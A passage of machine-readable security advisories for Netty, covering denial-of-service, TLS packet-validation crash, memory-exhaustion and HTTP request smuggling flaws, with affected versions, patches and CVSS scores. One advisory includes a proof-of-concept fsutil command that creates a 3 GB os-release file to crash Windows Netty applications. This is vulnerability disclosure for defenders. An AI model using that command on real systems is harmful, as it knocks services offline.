"WEB", "url": "https://security.netapp.com/advisory/ntap-20250221-0006" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2025-02-10T18:14:47Z", "nvd_published_at": "2025-02-10T22:15:38Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xq3w-v528-46rv", "published": "2024-11-12T19:53:17Z", "modified": "2025-02-18T16:16:53.215963Z", "aliases": [ "CVE-2024-47535" ], "related": [ "CGA-662r-hr8g-368h", "CGA-6hrh-hv46-9997", "CGA-6j48-cf22-44cr", "CGA-896j-whgv-hvrh", "CGA-954h-x5w4-9mp8", "CGA-973v-pfgw-gfcx", "CGA-9g9w-93jp-5j27", "CGA-cm4q-39fx-m36q", "CGA-crgc-hmgg-8m6p", "CGA-fp8m-fwcf-c57x", "CGA-j7w7-m586-rmf6", "CGA-m937-hhxp-2gm9", "CGA-pj55-r8cf-957f", "CGA-q7qp-mqc2-cqff", "CGA-qpr4-x3v9-rvj7", "CGA-vv7m-rc5q-gr82", "CGA-x6pw-hh9f-9g3j", "CGA-xpg8-pwc5-69x9" ], "summary": "Denial of Service attack on windows app using netty", "details": "### Summary\n\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.\n\n\n### Details\n\nWhen the library netty is loaded in a java windows application, the library tries to identify the system environnement in which it is executed.\n\nAt this stage, Netty tries to load both `/etc/os-release` and `/usr/lib/os-release` even though it is in a Windows environment. \n\n\u003cimg width=\"364\" alt=\"1\" src=\"https://github.com/user-attachments/assets/9466b181-9394-45a3-b0e3-1dcf105def59\"\u003e\n\nIf netty finds this files, it reads them and loads them into memory.\n\nBy default :\n\n- The JVM maximum memory size is set to 1 GB,\n- A non-privileged user can create a directory at `C:\\` and create files within it.\n\n\u003cimg width=\"340\" alt=\"2\" src=\"https://github.com/user-attachments/assets/43b359a2-5871-4592-ae2b-ffc40ac76831\"\u003e\n\n\u003cimg width=\"523\" alt=\"3\" src=\"https://github.com/user-attachments/assets/ad5c6eed-451c-4513-92d5-ba0eee7715c1\"\u003e\n\nthe source code identified :\nhttps://github.com/netty/netty/blob/4.1/common/src/main/java/io/netty/util/internal/PlatformDependent.java\n\nDespite the implementation of the function `normalizeOs()` the source code not verify the OS before reading `C:\\etc\\os-release` and `C:\\usr\\lib\\os-release`.\n\n### PoC\n\nCreate a file larger than 1 GB of data in `C:\\etc\\os-release` or `C:\\usr\\lib\\os-release` on a Windows environnement and start your Netty application.\n\nTo observe what the application does with the file, the security analyst used \"Process Monitor\" from the \"Windows SysInternals\" suite. (https://learn.microsoft.com/en-us/sysinternals/)\n\n```\ncd C:\\etc\nfsutil file createnew os-release 3000000000\n```\n\n\u003cimg width=\"519\" alt=\"4\" src=\"https://github.com/user-attachments/assets/39df22a3-462b-4fd0-af9a-aa30077ec08f\"\u003e\n\n\u003cimg width=\"517\" alt=\"5\" src=\"https://github.com/user-attachments/assets/129dbd50-fc36-4da5-8eb1-582123fb528f\"\u003e\n\nThe source code used is the Netty website code example : [Echo ‐ the very basic client and server](https://netty.io/4.1/xref/io/netty/example/echo/package-summary.html).\n\nThe vulnerability was tested on the 4.1.112.Final version.\n\nThe security analyst tried the same technique for `C:\\proc\\sys\\net\\core\\somaxconn` with a lot of values to impact Netty but the only things that works is the \"larger than 1 GB file\" technique. https://github.com/netty/netty/blob/c0fdb8e9f8f256990e902fcfffbbe10754d0f3dd/common/src/main/java/io/netty/util/NetUtil.java#L186\n\n### Impact\n\nBy loading the \"file larger than 1 GB\" into the memory, the Netty library exceeds the JVM memory limit and causes a crash in the java Windows application.\n\nThis behaviour occurs 100% of the time in both Server mode and Client mode if the large file exists.\n\nClient mode :\n\n\u003cimg width=\"449\" alt=\"6\" src=\"https://github.com/user-attachments/assets/f8fe1ed0-1a42-4490-b9ed-dbc9af7804be\"\u003e\n\nServer mode :\n\n\u003cimg width=\"464\" alt=\"7\" src=\"https://github.com/user-attachments/assets/b34b42bd-4fbd-4170-b93a-d29ba87b88eb\"\u003e\n\nsomaxconn :\n\n\u003cimg width=\"532\" alt=\"8\" src=\"https://github.com/user-attachments/assets/0656b3bb-32c6-4ae2-bff7-d93babba08a3\"\u003e\n\n### Severity\n\n- Attack vector : \"Local\" because the attacker needs to be on the system where the Netty application is running.\n- Attack complexity : \"Low\" because the attacker only need to create a massive file (regardless of its contents).\n- Privileges required : \"Low\" because the attacker requires a user account to exploit the vulnerability.\n- User intercation : \"None\" because the administrator don't need to accidentally click anywhere to trigger the vulnerability. Furthermore, the exploitation works with defaults windows/AD settings.\n- Scope : \"Unchanged\" because only Netty is affected by the vulnerability.\n- Confidentiality : \"None\" because no data is exposed through exploiting the vulnerability.\n- Integrity : \"None\" because the explotation of the vulnerability does not allow editing, deleting or adding data elsewhere.\n- Availability : \"High\" because the exploitation of this vulnerability crashes the entire java application.", "affected": [ { "package": { "name": "io.netty:netty-common", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.115.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.11.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", "4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", "4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c= 4.1.114.Final", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-xq3w-v528-46rv/GHSA-xq3w-v528-46rv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47535" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/fbf7a704a82e7449b48bd0bbb679f5661c6d61a3" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-11-12T19:53:17Z", "nvd_published_at": "2024-11-12T16:15:22Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4g8c-wm8x-jfhw", "published": "2025-02-10T17:38:10Z", "modified": "2025-04-16T19:36:10.233999Z", "aliases": [ "CVE-2025-24970" ], "related": [ "CGA-2rmr-wmhc-2w99", "CGA-3ff3-j2gh-ch6w", "CGA-4c9r-4w8v-hrg9", "CGA-4fc4-gx3h-pr85", "CGA-4vhm-8vvc-xp32", "CGA-5j2r-r3qg-5f8j", "CGA-5w34-p6wm-7m57", "CGA-75hc-h3fm-76g3", "CGA-77xw-mv88-q2mp", "CGA-8qcx-xrm8-v435", "CGA-92vf-fmhh-m858", "CGA-9cfj-2vcq-2qmg", "CGA-f8r8-7qpm-75vh", "CGA-g9f5-gvgx-jg3v", "CGA-gj2p-246v-gxg2", "CGA-hvvp-w5fp-mfj3", "CGA-pxx2-j5vx-hpc7", "CGA-q4fc-47cm-pg7p", "CGA-q847-pq59-hvfv", "CGA-v2hv-cwjf-vh29", "CGA-v56f-9x62-8x8w", "CGA-vpqx-mv83-m9q3", "CGA-vxw2-mqpj-vp92", "CGA-w7hc-8fp9-mm8j", "CGA-xvj3-hqwc-49qg", "CVE-2025-24970" ], "summary": "SslHandler doesn't correctly validate packets which can lead to native crash when using native SSLEngine", "details": "### Impact\nWhen a special crafted packet is received via SslHandler it doesn't correctly handle validation of such a packet in all cases which can lead to a native crash.\n\n### Workarounds\nAs workaround its possible to either disable the usage of the native SSLEngine or changing the code from:\n\n```\nSslContext context = ...;\nSslHandler handler = context.newHandler(....);\n```\n\nto:\n\n```\nSslContext context = ...;\nSSLEngine engine = context.newEngine(....);\nSslHandler handler = new SslHandler(engine, ....);\n```", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.91.Final" }, { "fixed": "4.1.118.Final" } ] } ], "versions": [ "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.115.Final", "4.1.116.Final", "4.1.117.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c= 4.1.117.Final", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-4g8c-wm8x-jfhw/GHSA-4g8c-wm8x-jfhw.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-4g8c-wm8x-jfhw" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24970" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/87f40725155b2f89adfde68c7732f97c153676c4" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250221-0005" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24970-netty-vulnerability-detection" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24970-netty-vulnerability-mitigation" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2025-02-10T17:38:10Z", "nvd_published_at": "2025-02-10T22:15:38Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6mjq-h674-j845", "published": "2023-06-20T16:33:22Z", "modified": "2024-10-22T05:29:07.697767Z", "aliases": [ "CGA-4p9j-8g99-x3wm", "CVE-2023-34462" ], "related": [ "CGA-cp7x-r3q6-pfcj", "CGA-h5cv-9cc6-j4jf", "CGA-r5mp-477x-xh5j", "CGA-rq5c-v396-7c72", "CGA-xcw6-rv74-mwgj", "CVE-2023-34462" ], "summary": "netty-handler SniHandler 16MB allocation", "details": "### Summary\nThe `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap.\n\n### Details\nThe `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. \n\nNormally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`\n\n1/ allocate a 16MB `ByteBuf`\n2/ not fail `decode` method `in` buffer\n3/ get out of the loop without an exception\n\nThe combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection.\n\n### Impact\nIf the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.94.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", "4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", "4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-6mjq-h674-j845/GHSA-6mjq-h674-j845.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34462" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/535da17e45201ae4278c0479e6162bb4127d4c32" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230803-0001" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5558" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-06-20T16:33:22Z", "nvd_published_at": "2023-06-22T23:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9959-6p3m-wxpc", "published": "2020-06-30T21:01:31Z", "modified": "2023-11-08T03:57:37.697735Z", "aliases": [ "CVE-2014-3488" ], "summary": "Denial of service in Netty", "details": "The SslHandler in Netty before 3.9.2 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted SSLv2Hello message.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-9959-6p3m-wxpc/GHSA-9959-6p3m-wxpc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3488" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/2562" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/2fa9400a59d0563a66908aba55c41e7285a04994" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGJBOSSNETTY-31630" }, { "type": "WEB", "url": "http://netty.io/news/2014/06/11/3-9-2-Final.html" }, { "type": "WEB", "url": "http://secunia.com/advisories/59196" } ], "database_specific": { "cwe_ids": [ "CWE-119" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:50:42Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-ff2w-cq2g-wv5f", "published": "2020-02-21T18:55:50Z", "modified": "2024-03-14T05:20:05.937087Z", "aliases": [ "CVE-2020-7238" ], "summary": "HTTP Request Smuggling in Netty", "details": "Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. This issue exists because of an incomplete fix for CVE-2019-16869.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.43" }, { "fixed": "4.1.45" } ] } ], "versions": [ "4.1.43.Final", "4.1.44.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c= 4.1.44", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-ff2w-cq2g-wv5f/GHSA-ff2w-cq2g-wv5f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7238" }, { "type": "WEB", "url": "https://github.com/jdordonezn/CVE-2020-72381/issues/1" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9861" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9865" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://netty.io/news" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8d554aad889d12b140d9fd7d2d6fc2e8716e9792f6f4e4b2cdc2d05@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r131e572d003914843552fa45c4398b9903fb74144986e8b107c0a3a7@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:49Z", "nvd_published_at": "2020-01-27T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mm9x-g8pc-w292", "published": "2020-06-15T19:36:16Z", "modified": "2024-03-14T05:18:47.685399Z", "aliases": [ "CVE-2020-11612" ], "summary": "Denial of Service in Netty", "details": "The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.0" }, { "fixed": "4.1.46" } ] } ], "versions": [ "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mm9x-g8pc-w292/GHSA-mm9x-g8pc-w292.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11612" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/6168" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9924" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9c30b7fca4baedebcb46d6e0f90071b30cc4a0e074164d50122ec5ec@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra98e3a8541a09271f96478d5e22c7e3bd1afdf48641c8be25d62d9f9@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd302ddb501fa02c5119120e5fc21df9a1c00e221c490edbe2d7ad365@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1ea144e91f03175d661b2d3e97c7d74b912e019613fa90419cf63f4@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ref2c8a0cbb3b8271e5b9a06457ba78ad2028128627186531730f50ef@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ref3943adbc3a8813aee0e3a9dd919bacbb27f626be030a3c6d6c7f83@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": 